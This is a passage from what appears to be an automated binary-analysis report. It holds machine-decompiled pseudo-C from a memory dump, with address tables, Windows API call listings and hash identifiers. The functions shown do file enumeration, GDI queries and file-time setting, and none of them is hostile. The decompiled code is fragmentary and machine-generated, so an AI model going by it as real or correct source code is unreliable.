    										 *((intOrPtr*)( *_t111 + 8))(_t111);
    									}
    									_t93 = _v212;
    									 *((intOrPtr*)( *_t93 + 8))(_t93);
    									_t95 = _v212;
    									 *((intOrPtr*)( *_t95 + 8))(_t95);
    									_t97 = _v224;
    									 *((intOrPtr*)( *_t97 + 8))(_t97);
    									if(_t149 != 0) {
    										_t146 = _t149;
    									}
    									goto L18;
    								}
    								_t113 = _v184;
    								 *((intOrPtr*)( *_t113 + 8))(_t113);
    							}
    							_t115 = _v192;
    							 *((intOrPtr*)( *_t115 + 8))(_t115);
    							_t79 = _v200;
    						}
    						 *((intOrPtr*)( *_t79 + 8))(_t79);
    						goto L18;
    					}
    				}
    				_push(_a12);
    				_push(_a8);
    				_push(_a4);
    				return E008499C7();
    			}
























































    0x008497d0
    0x008497da
    0x008497f5
    0x00849801
    0x0084980b
    0x00849812
    0x00849816
    0x00849817
    0x0084981d
    0x0084981f
    0x0084981f
    0x00849826
    0x00849828
    0x00849829
    0x00849831
    0x00849832
    0x00849833
    0x00849840
    0x008499bb
    0x00000000
    0x00849846
    0x00849846
    0x00849856
    0x0084985b
    0x0084985f
    0x0084986c
    0x00849876
    0x00849877
    0x0084987d
    0x0084988f
    0x00849893
    0x00849895
    0x00849896
    0x00849898
    0x00849899
    0x0084989a
    0x0084989d
    0x0084989e
    0x0084989f
    0x008498a4
    0x008498a8
    0x008498ae
    0x008498c4
    0x008498cc
    0x008498d6
    0x008498dc
    0x008498e0
    0x008498e9
    0x008498ee
    0x008498f1
    0x00849908
    0x0084990e
    0x0084991c
    0x0084991e
    0x0084992a
    0x0084992d
    0x00849942
    0x00849945
    0x00849949
    0x0084994d
    0x00849951
    0x00849958
    0x0084995c
    0x00849960
    0x00849969
    0x00849974
    0x00849979
    0x0084997a
    0x00849980
    0x00849987
    0x00849982
    0x00849982
    0x00849982
    0x0084998d
    0x00849994
    0x00849994
    0x00849997
    0x0084999e
    0x008499a1
    0x008499a8
    0x008499ab
    0x008499b2
    0x008499b7
    0x008499b9
    0x008499b9
    0x00000000
    0x008499b7
    0x008498b0
    0x008498b7
    0x008498b7
    0x0084987f
    0x00849886
    0x00849889
    0x00849889
    0x00849864
    0x00000000
    0x00849864
    0x00849840
    0x008497dc
    0x008497e0
    0x008497e4
    0x00000000

    APIs
      • Part of subcall function 00849682: GetDC.USER32(00000000), ref: 00849686
      • Part of subcall function 00849682: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00849691
      • Part of subcall function 00849682: ReleaseDC.USER32(00000000,00000000), ref: 0084969C
    • GetObjectW.GDI32(?,00000018,?,00000000,?,75085B70), ref: 00849801
      • Part of subcall function 008499C7: GetDC.USER32(00000000), ref: 008499D0
      • Part of subcall function 008499C7: GetObjectW.GDI32(?,00000018,?,?,?,75085B70,?,?,?,?,?,008497ED,?,?,?), ref: 008499FF
      • Part of subcall function 008499C7: ReleaseDC.USER32(00000000,?), ref: 00849A93
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ObjectRelease$CapsDevice
    • String ID: (
    • API String ID: 1061551593-3887548279
    • Opcode ID: 0e69a922c5abd2b7799eb69425ac6cf9c1b719ee0a0eefde93f32524624ffbbd
    • Instruction ID: 8fee0216f41192f783d5442132907fc8869a24ce7612119f0b8014842f220005
    • Opcode Fuzzy Hash: 0e69a922c5abd2b7799eb69425ac6cf9c1b719ee0a0eefde93f32524624ffbbd
    • Instruction Fuzzy Hash: 5A611471604305AFD220CF68C884E6BBBE9FF89704F10492DF59ACB260DB71E905CB62
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _swprintf
    • String ID: %ls$%s: %s
    • API String ID: 589789837-2259941744
    • Opcode ID: 884bf7715d43d3ae9f289526fa7ca7b81d36c1dda1f2161b56ce9d4826dbcd7a
    • Instruction ID: 0a04a8a2e3afc5a1e43b63ac1f6ffe29bd96aa749b9c5a114b6d481915666699
    • Opcode Fuzzy Hash: 884bf7715d43d3ae9f289526fa7ca7b81d36c1dda1f2161b56ce9d4826dbcd7a
    • Instruction Fuzzy Hash: 95513431A8C70CFAF6211A949D42F237655FB18B1CF308A0BB797E44E0C5B65510AF4B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00859E9E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
    				intOrPtr _v0;
    				char _v6;
    				char _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v36;
    				intOrPtr* _v64;
    				intOrPtr _v96;
    				intOrPtr* _v100;
    				CHAR* _v104;
    				signed int _v116;
    				char _v290;
    				signed int _v291;
    				struct _WIN32_FIND_DATAA _v336;
    				union _FINDEX_INFO_LEVELS _v340;
    				signed int _v344;
    				signed int _v348;
    				intOrPtr _v440;
    				intOrPtr* _t80;
    				signed int _t82;
    				signed int _t87;
    				signed int _t91;
    				signed int _t93;
    				signed int _t95;
    				signed int _t96;
    				signed int _t100;
    				signed int _t103;
    				signed int _t108;
    				signed int _t111;
    				intOrPtr _t113;
    				signed char _t115;
    				union _FINDEX_INFO_LEVELS _t123;
    				signed int _t128;
    				signed int _t131;
    				void* _t137;
    				void* _t139;
    				signed int _t140;
    				signed int _t143;
    				signed int _t145;
    				signed int _t147;
    				signed int* _t148;
    				signed int _t151;
    				void* _t154;
    				CHAR* _t155;
    				char _t158;
    				char _t160;
    				intOrPtr* _t163;
    				void* _t164;
    				intOrPtr* _t165;
    				signed int _t167;
    				void* _t169;
    				intOrPtr* _t170;
    				signed int _t174;
    				signed int _t178;
    				signed int _t179;
    				intOrPtr* _t184;
    				void* _t193;
    				intOrPtr _t194;
    				signed int _t196;
    				signed int _t197;
    				signed int _t199;
    				signed int _t200;
    				signed int _t202;
    				union _FINDEX_INFO_LEVELS _t203;
    				signed int _t208;
    				signed int _t210;
    				signed int _t211;
    				void* _t213;
    				intOrPtr _t214;
    				void* _t215;
    				signed int _t219;
    				void* _t221;
    				signed int _t222;
    				void* _t223;
    				void* _t224;
    				void* _t225;
    				signed int _t226;
    				void* _t227;
    				void* _t228;
    
    				_t80 = _a8;
    				_t224 = _t223 - 0x20;
    				if(_t80 != 0) {
    					_t208 = _a4;
    					_t160 = 0;
    					 *_t80 = 0;
    					_t199 = 0;
    					_t151 = 0;
    					_v36 = 0;
    					_v336.cAlternateFileName = 0;
    					_v28 = 0;
    					__eflags =  *_t208;
    					if( *_t208 == 0) {
    						L9:
    						_v12 = _v12 & 0x00000000;
    						_t82 = _t151 - _t199;
    						_v8 = _t160;
    						_t191 = (_t82 >> 2) + 1;
    						__eflags = _t151 - _t199;
    						_v16 = (_t82 >> 2) + 1;
    						asm("sbb esi, esi");
    						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
    						__eflags = _t210;
    						if(_t210 != 0) {
    							_t197 = _t199;
    							_t158 = _t160;
    							do {
    								_t184 =  *_t197;
    								_t17 = _t184 + 1; // 0x1
    								_v8 = _t17;
    								do {
    									_t143 =  *_t184;
    									_t184 = _t184 + 1;
    									__eflags = _t143;
    								} while (_t143 != 0);
    								_t158 = _t158 + 1 + _t184 - _v8;
    								_t197 = _t197 + 4;
    								_t145 = _v12 + 1;
    								_v12 = _t145;
    								__eflags = _t145 - _t210;
    							} while (_t145 != _t210);
    							_t191 = _v16;
    							_v8 = _t158;
    							_t151 = _v336.cAlternateFileName;
    						}
    						_t211 = E00856F32(_t191, _v8, 1);
    						_t225 = _t224 + 0xc;
    						__eflags = _t211;
    						if(_t211 != 0) {
    							_t87 = _t211 + _v16 * 4;
    							_v20 = _t87;
    							_t192 = _t87;
    							_v16 = _t87;
    							__eflags = _t199 - _t151;
    							if(_t199 == _t151) {
    								L23:
    								_t200 = 0;
    								__eflags = 0;
    								 *_a8 = _t211;
    								goto L24;
    							} else {
    								_t93 = _t211 - _t199;
    								__eflags = _t93;
    								_v24 = _t93;
    								do {
    									_t163 =  *_t199;
    									_v12 = _t163 + 1;
    									do {
    										_t95 =  *_t163;
    										_t163 = _t163 + 1;
    										__eflags = _t95;
    									} while (_t95 != 0);
    									_t164 = _t163 - _v12;
    									_t35 = _t164 + 1; // 0x1
    									_t96 = _t35;
    									_push(_t96);
    									_v12 = _t96;
    									_t100 = E0085DDC1(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
    									_t225 = _t225 + 0x10;
    									__eflags = _t100;
    									if(_t100 != 0) {
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										E00857E31();
    										asm("int3");
    										_t221 = _t225;
    										_push(_t164);
    										_t165 = _v64;
    										_t47 = _t165 + 1; // 0x1
    										_t193 = _t47;
    										do {
    											_t103 =  *_t165;
    											_t165 = _t165 + 1;
    											__eflags = _t103;
    										} while (_t103 != 0);
    										_push(_t199);
    										_t202 = _a8;
    										_t167 = _t165 - _t193 + 1;
    										_v12 = _t167;
    										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
    										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
    											_push(_t151);
    											_t50 = _t202 + 1; // 0x1
    											_t154 = _t50 + _t167;
    											_t213 = E00857B91(_t167, _t154, 1);
    											_t169 = _t211;
    											__eflags = _t202;
    											if(_t202 == 0) {
    												L34:
    												_push(_v12);
    												_t154 = _t154 - _t202;
    												_t108 = E0085DDC1(_t169, _t213 + _t202, _t154, _v0);
    												_t226 = _t225 + 0x10;
    												__eflags = _t108;
    												if(__eflags != 0) {
    													goto L37;
    												} else {
    													_t137 = E0085A26D(_a12, _t193, __eflags, _t213);
    													E00857AC6(0);
    													_t139 = _t137;
    													goto L36;
    												}
    											} else {
    												_push(_t202);
    												_t140 = E0085DDC1(_t169, _t213, _t154, _a4);
    												_t226 = _t225 + 0x10;
    												__eflags = _t140;
    												if(_t140 != 0) {
    													L37:
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													_push(0);
    													E00857E31();
    													asm("int3");
    													_push(_t221);
    													_t222 = _t226;
    													_t227 = _t226 - 0x150;
    													_t111 =  *0x86d668; // 0x14325215
    													_v116 = _t111 ^ _t222;
    													_t170 = _v100;
    													_push(_t154);
    													_t155 = _v104;
    													_push(_t213);
    													_t214 = _v96;
    													_push(_t202);
    													_v440 = _t214;
    													while(1) {
    														__eflags = _t170 - _t155;
    														if(_t170 == _t155) {
    															break;
    														}
    														_t113 =  *_t170;
    														__eflags = _t113 - 0x2f;
    														if(_t113 != 0x2f) {
    															__eflags = _t113 - 0x5c;
    															if(_t113 != 0x5c) {
    																__eflags = _t113 - 0x3a;
    																if(_t113 != 0x3a) {
    																	_t170 = E0085DE10(_t155, _t170);
    																	continue;
    																}
    															}
    														}
    														break;
    													}
    													_t194 =  *_t170;
    													__eflags = _t194 - 0x3a;
    													if(_t194 != 0x3a) {
    														L47:
    														_t203 = 0;
    														__eflags = _t194 - 0x2f;
    														if(_t194 == 0x2f) {
    															L51:
    															_t115 = 1;
    															__eflags = 1;
    														} else {
    															__eflags = _t194 - 0x5c;
    															if(_t194 == 0x5c) {
    																goto L51;
    															} else {
    																__eflags = _t194 - 0x3a;
    																if(_t194 == 0x3a) {
    																	goto L51;
    																} else {
    																	_t115 = 0;
    																}
    															}
    														}
    														asm("sbb eax, eax");
    														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
    														E0084E920(_t203,  &_v336, _t203, 0x140);
    														_t228 = _t227 + 0xc;
    														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
    														_t123 = _v340;
    														__eflags = _t215 - 0xffffffff;
    														if(_t215 != 0xffffffff) {
    															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
    															__eflags = _t174;
    															_v348 = _t174 >> 2;
    															do {
    																__eflags = _v336.cFileName - 0x2e;
    																if(_v336.cFileName != 0x2e) {
    																	L64:
    																	_push(_t123);
    																	_push(_v344);
    																	_t123 =  &(_v336.cFileName);
    																	_push(_t155);
    																	_push(_t123);
    																	L28();
    																	_t228 = _t228 + 0x10;
    																	__eflags = _t123;
    																	if(_t123 != 0) {
    																		goto L54;
    																	} else {
    																		goto L65;
    																	}
    																} else {
    																	_t178 = _v291;
    																	__eflags = _t178;
    																	if(_t178 == 0) {
    																		goto L65;
    																	} else {
    																		__eflags = _t178 - 0x2e;
    																		if(_t178 != 0x2e) {
    																			goto L64;
    																		} else {
    																			__eflags = _v290;
    																			if(_v290 == 0) {
    																				goto L65;
    																			} else {
    																				goto L64;
    																			}
    																		}
    																	}
    																}
    																goto L58;
    																L65:
    																_t128 = FindNextFileA(_t215,  &_v336);
    																__eflags = _t128;
    																_t123 = _v340;
    															} while (_t128 != 0);
    															_t195 =  *_t123;
    															_t179 = _v348;
    															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
    															__eflags = _t179 - _t131;
    															if(_t179 != _t131) {
    																E00855070(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00859E86);
    															}
    														} else {
    															_push(_t123);
    															_push(_t203);
    															_push(_t203);
    															_push(_t155);
    															L28();
    															L54:
    															_t203 = _t123;
    														}
    														__eflags = _t215 - 0xffffffff;
    														if(_t215 != 0xffffffff) {
    															FindClose(_t215);
    														}
    													} else {
    														__eflags = _t170 -  &(_t155[1]);
    														if(_t170 ==  &(_t155[1])) {
    															goto L47;
    														} else {
    															_push(_t214);
    															_push(0);
    															_push(0);
    															_push(_t155);
    															L28();
    														}
    													}
    													L58:
    													__eflags = _v16 ^ _t222;
    													return E0084E243(_v16 ^ _t222);
    												} else {
    													goto L34;
    												}
    											}
    										} else {
    											_t139 = 0xc;
    											L36:
    											return _t139;
    										}
    									} else {
    										goto L22;
    									}
    									goto L68;
    									L22:
    									_t196 = _v16;
    									 *((intOrPtr*)(_v24 + _t199)) = _t196;
    									_t199 = _t199 + 4;
    									_t192 = _t196 + _v12;
    									_v16 = _t196 + _v12;
    									__eflags = _t199 - _t151;
    								} while (_t199 != _t151);
    								goto L23;
    							}
    						} else {
    							_t200 = _t199 | 0xffffffff;
    							L24:
    							E00857AC6(0);
    							goto L25;
    						}
    					} else {
    						while(1) {
    							_v8 = 0x3f2a;
    							_v6 = _t160;
    							_t147 = E0085DDD0( *_t208,  &_v8);
    							__eflags = _t147;
    							if(_t147 != 0) {
    								_push( &_v36);
    								_push(_t147);
    								_push( *_t208);
    								L38();
    								_t224 = _t224 + 0xc;
    							} else {
    								_t147 =  &_v36;
    								_push(_t147);
    								_push(0);
    								_push(0);
    								_push( *_t208);
    								L28();
    								_t224 = _t224 + 0x10;
    							}
    							_t200 = _t147;
    							__eflags = _t200;
    							if(_t200 != 0) {
    								break;
    							}
    							_t208 = _t208 + 4;
    							_t160 = 0;
    							__eflags =  *_t208;
    							if( *_t208 != 0) {
    								continue;
    							} else {
    								_t151 = _v336.cAlternateFileName;
    								_t199 = _v36;
    								goto L9;
    							}
    							goto L68;
    						}
    						L25:
    						E0085A248( &_v36);
    						_t91 = _t200;
    						goto L26;
    					}
    				} else {
    					_t148 = E00857F42();
    					_t219 = 0x16;
    					 *_t148 = _t219;
    					E00857E21();
    					_t91 = _t219;
    					L26:
    					return _t91;
    				}
    				L68:
    			}





















































































    0x00859ea3
    0x00859ea6
    0x00859eac
    0x00859ec4
    0x00859ec7
    0x00859ecb
    0x00859ecd
    0x00859ecf
    0x00859ed1
    0x00859ed4
    0x00859ed7
    0x00859eda
    0x00859edc
    0x00859f34
    0x00859f34
    0x00859f3a
    0x00859f3c
    0x00859f47
    0x00859f4b
    0x00859f4d
    0x00859f50
    0x00859f54
    0x00859f54
    0x00859f56
    0x00859f58
    0x00859f5a
    0x00859f5c
    0x00859f5c
    0x00859f5e
    0x00859f61
    0x00859f64
    0x00859f64
    0x00859f66
    0x00859f67
    0x00859f67
    0x00859f72
    0x00859f74
    0x00859f77
    0x00859f78
    0x00859f7b
    0x00859f7b
    0x00859f7f
    0x00859f82
    0x00859f85
    0x00859f85
    0x00859f93
    0x00859f95
    0x00859f98
    0x00859f9a
    0x00859fa4
    0x00859fa7
    0x00859faa
    0x00859fac
    0x00859faf
    0x00859fb1
    0x0085a001
    0x0085a004
    0x0085a004
    0x0085a006
    0x00000000
    0x00859fb3
    0x00859fb5
    0x00859fb5
    0x00859fb7
    0x00859fba
    0x00859fba
    0x00859fbf
    0x00859fc2
    0x00859fc2
    0x00859fc4
    0x00859fc5
    0x00859fc5
    0x00859fc9
    0x00859fcc
    0x00859fcc
    0x00859fcf
    0x00859fd2
    0x00859fdf
    0x00859fe4
    0x00859fe7
    0x00859fe9
    0x0085a023
    0x0085a024
    0x0085a025
    0x0085a026
    0x0085a027
    0x0085a028
    0x0085a02d
    0x0085a031
    0x0085a033
    0x0085a034
    0x0085a037
    0x0085a037
    0x0085a03a
    0x0085a03a
    0x0085a03c
    0x0085a03d
    0x0085a03d
    0x0085a046
    0x0085a047
    0x0085a04a
    0x0085a04d
    0x0085a050
    0x0085a052
    0x0085a059
    0x0085a05b
    0x0085a05e
    0x0085a068
    0x0085a06b
    0x0085a06c
    0x0085a06e
    0x0085a082
    0x0085a082
    0x0085a085
    0x0085a08f
    0x0085a094
    0x0085a097
    0x0085a099
    0x00000000
    0x0085a09b
    0x0085a09f
    0x0085a0a8
    0x0085a0ae
    0x00000000
    0x0085a0b1
    0x0085a070
    0x0085a070
    0x0085a076
    0x0085a07b
    0x0085a07e
    0x0085a080
    0x0085a0b7
    0x0085a0b9
    0x0085a0ba
    0x0085a0bb
    0x0085a0bc
    0x0085a0bd
    0x0085a0be
    0x0085a0c3
    0x0085a0c6
    0x0085a0c7
    0x0085a0c9
    0x0085a0cf
    0x0085a0d6
    0x0085a0d9
    0x0085a0dc
    0x0085a0dd
    0x0085a0e0
    0x0085a0e1
    0x0085a0e4
    0x0085a0e5
    0x0085a106
    0x0085a106
    0x0085a108
    0x00000000
    0x00000000
    0x0085a0ed
    0x0085a0ef
    0x0085a0f1
    0x0085a0f3
    0x0085a0f5
    0x0085a0f7
    0x0085a0f9
    0x0085a104
    0x00000000
    0x0085a104
    0x0085a0f9
    0x0085a0f5
    0x00000000
    0x0085a0f1
    0x0085a10a
    0x0085a10c
    0x0085a10f
    0x0085a128
    0x0085a128
    0x0085a12a
    0x0085a12d
    0x0085a13d
    0x0085a13f
    0x0085a13f
    0x0085a12f
    0x0085a12f
    0x0085a132
    0x00000000
    0x0085a134
    0x0085a134
    0x0085a137
    0x00000000
    0x0085a139
    0x0085a139
    0x0085a139
    0x0085a137
    0x0085a132
    0x0085a14d
    0x0085a151
    0x0085a15f
    0x0085a164
    0x0085a179
    0x0085a17b
    0x0085a181
    0x0085a184
    0x0085a1b6
    0x0085a1b6
    0x0085a1bb
    0x0085a1c1
    0x0085a1c1
    0x0085a1c8
    0x0085a1e2
    0x0085a1e2
    0x0085a1e3
    0x0085a1e9
    0x0085a1ef
    0x0085a1f0
    0x0085a1f1
    0x0085a1f6
    0x0085a1f9
    0x0085a1fb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0085a1ca
    0x0085a1ca
    0x0085a1d0
    0x0085a1d2
    0x00000000
    0x0085a1d4
    0x0085a1d4
    0x0085a1d7
    0x00000000
    0x0085a1d9
    0x0085a1d9
    0x0085a1e0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0085a1e0
    0x0085a1d7
    0x0085a1d2
    0x00000000
    0x0085a1fd
    0x0085a205
    0x0085a20b
    0x0085a20d
    0x0085a20d
    0x0085a215
    0x0085a21a
    0x0085a222
    0x0085a225
    0x0085a227
    0x0085a23b
    0x0085a240
    0x0085a186
    0x0085a186
    0x0085a187
    0x0085a188
    0x0085a189
    0x0085a18a
    0x0085a192
    0x0085a192
    0x0085a192
    0x0085a194
    0x0085a197
    0x0085a19a
    0x0085a19a
    0x0085a111
    0x0085a114
    0x0085a116
    0x00000000
    0x0085a118
    0x0085a118
    0x0085a11b
    0x0085a11c
    0x0085a11d
    0x0085a11e
    0x0085a123
    0x0085a116
    0x0085a1a2
    0x0085a1a7
    0x0085a1b2
    0x00000000
    0x00000000
    0x00000000
    0x0085a080
    0x0085a054
    0x0085a056
    0x0085a0b2
    0x0085a0b6
    0x0085a0b6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00859feb
    0x00859fee
    0x00859ff1
    0x00859ff4
    0x00859ff7
    0x00859ffa
    0x00859ffd
    0x00859ffd
    0x00000000
    0x00859fba
    0x00859f9c
    0x00859f9c
    0x0085a008
    0x0085a00a
    0x00000000
    0x0085a00f
    0x00859ede
    0x00859ede
    0x00859ee1
    0x00859eea
    0x00859eed
    0x00859ef4
    0x00859ef6
    0x00859f0f
    0x00859f10
    0x00859f11
    0x00859f13
    0x00859f18
    0x00859ef8
    0x00859ef8
    0x00859efb
    0x00859efc
    0x00859efe
    0x00859f00
    0x00859f02
    0x00859f07
    0x00859f07
    0x00859f1b
    0x00859f1d
    0x00859f1f
    0x00000000
    0x00000000
    0x00859f25
    0x00859f28
    0x00859f2a
    0x00859f2c
    0x00000000
    0x00859f2e
    0x00859f2e
    0x00859f31
    0x00000000
    0x00859f31
    0x00000000
    0x00859f2c
    0x0085a010
    0x0085a013
    0x0085a018
    0x00000000
    0x0085a01b
    0x00859eae
    0x00859eae
    0x00859eb5
    0x00859eb6
    0x00859eb8
    0x00859ebd
    0x0085a01c
    0x0085a020
    0x0085a020
    0x00000000

    APIs
    • _free.LIBCMT ref: 0085A00A
      • Part of subcall function 00857E31: IsProcessorFeaturePresent.KERNEL32(00000017,00857E20,0000002C,0086AA30,0085AFC3,00000000,00000000,008585F4,?,?,00857E2D,00000000,00000000,00000000,00000000,00000000), ref: 00857E33
      • Part of subcall function 00857E31: GetCurrentProcess.KERNEL32(C0000417,0086AA30,0000002C,00857B5E,00000016,008585F4), ref: 00857E55
      • Part of subcall function 00857E31: TerminateProcess.KERNEL32(00000000), ref: 00857E5C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
    • String ID: *?$.
    • API String ID: 2667617558-3972193922
    • Opcode ID: 508a7545cd9675eca434abbd3fe5994820486329c798d74d3b033fce6636bdc7
    • Instruction ID: e8449b65cb5a0f406abee0c13a76fe50b233d9d48437e1b58843cfe8d504e78d
    • Opcode Fuzzy Hash: 508a7545cd9675eca434abbd3fe5994820486329c798d74d3b033fce6636bdc7
    • Instruction Fuzzy Hash: 50519E75E0020AEFDF14DFA8C881AADBBB5FF48315F248169EC54E7341EA359E098B51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00837663(void* __ecx, void* __edx) {
    				void* __esi;
    				char _t54;
    				signed int _t57;
    				void* _t61;
    				signed int _t62;
    				signed int _t68;
    				signed int _t85;
    				void* _t90;
    				void* _t99;
    				void* _t101;
    				intOrPtr* _t106;
    				void* _t108;
    
    				_t99 = __edx;
    				E0084D8C4(E0086131C, __ecx);
    				E0084D9C0();
    				_t106 =  *((intOrPtr*)(_t108 + 0xc));
    				if( *_t106 == 0) {
    					L3:
    					_t101 = 0x802;
    					E0083FAE7(_t108 - 0x1010, _t106, 0x802);
    					L4:
    					_t81 =  *((intOrPtr*)(_t108 + 8));
    					E00837866(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
    					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
    					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
    						__eflags =  *((char*)(_t108 + 0x10));
    						if(__eflags == 0) {
    							E0083FABF(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
    							E00836FEC(_t108 - 0x307c);
    							_push(0);
    							_t54 = E0083A255(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
    							_t85 =  *(_t108 - 0x2074);
    							 *((char*)(_t108 + 0x13)) = _t54;
    							__eflags = _t85 & 0x00000001;
    							if((_t85 & 0x00000001) != 0) {
    								__eflags = _t85 & 0xfffffffe;
    								E0083A1D3(_t106, _t85 & 0xfffffffe);
    							}
    							E008394D4(_t108 - 0x2034);
    							 *((intOrPtr*)(_t108 - 4)) = 1;
    							_t57 = E00839C8A(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
    							__eflags = _t57;
    							if(_t57 != 0) {
    								_push(0);
    								_push(_t108 - 0x2034);
    								_push(0);
    								_t68 = E00833AAF(_t81, _t99);
    								__eflags = _t68;
    								if(_t68 != 0) {
    									E00839572(_t108 - 0x2034);
    								}
    							}
    							E008394D4(_t108 - 0x50a0);
    							__eflags =  *((char*)(_t108 + 0x13));
    							 *((char*)(_t108 - 4)) = 2;
    							if( *((char*)(_t108 + 0x13)) != 0) {
    								_t62 = E0083980C(_t108 - 0x50a0, _t106, _t106, 5);
    								__eflags = _t62;
    								if(_t62 != 0) {
    									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
    								}
    							}
    							E0083A1D3(_t106,  *(_t108 - 0x2074));
    							E00839506(_t108 - 0x50a0);
    							_t90 = _t108 - 0x2034;
    						} else {
    							E008394D4(_t108 - 0x60c4);
    							_push(1);
    							_push(_t108 - 0x60c4);
    							_push(0);
    							 *((intOrPtr*)(_t108 - 4)) = 0;
    							E00833AAF(_t81, _t99);
    							_t90 = _t108 - 0x60c4;
    						}
    						_t61 = E00839506(_t90);
    					} else {
    						E00831F29(_t113, 0x53, _t81 + 0x1e, _t106);
    						_t61 = E00836F18(0x8700e0, 3);
    					}
    					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
    					return _t61;
    				}
    				_t112 =  *((intOrPtr*)(_t106 + 2));
    				if( *((intOrPtr*)(_t106 + 2)) != 0) {
    					goto L3;
    				} else {
    					_t101 = 0x802;
    					E0083FAE7(_t108 - 0x1010, 0x862490, 0x802);
    					E0083FABF(_t112, _t108 - 0x1010, _t106, 0x802);
    					goto L4;
    				}
    			}















    0x00837663
    0x00837668
    0x00837672
    0x00837679
    0x00837682
    0x008376b1
    0x008376b1
    0x008376bf
    0x008376c4
    0x008376c4
    0x008376d4
    0x008376d9
    0x008376e1
    0x00837700
    0x00837704
    0x00837741
    0x0083774c
    0x00837759
    0x0083775c
    0x00837761
    0x00837767
    0x0083776a
    0x0083776d
    0x0083776f
    0x00837774
    0x00837774
    0x0083777f
    0x0083778c
    0x0083779a
    0x0083779f
    0x008377a1
    0x008377a3
    0x008377ac
    0x008377ad
    0x008377ae
    0x008377b3
    0x008377b5
    0x008377bd
    0x008377bd
    0x008377b5
    0x008377c8
    0x008377cd
    0x008377d1
    0x008377d5
    0x008377e0
    0x008377e5
    0x008377e7
    0x00837804
    0x00837804
    0x008377e7
    0x00837811
    0x0083781c
    0x00837821
    0x00837706
    0x0083770c
    0x00837711
    0x0083771b
    0x0083771c
    0x0083771f
    0x00837722
    0x00837727
    0x00837727
    0x00837827
    0x008376e3
    0x008376ea
    0x008376f6
    0x008376f6
    0x00837832
    0x0083783c
    0x0083783c
    0x00837684
    0x00837688
    0x00000000
    0x0083768a
    0x0083768a
    0x0083769c
    0x008376aa
    0x00000000
    0x008376aa

    APIs
    • __EH_prolog.LIBCMT ref: 00837668
    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00837804
      • Part of subcall function 0083A1D3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A009,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A1E7
      • Part of subcall function 0083A1D3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A009,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A218
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
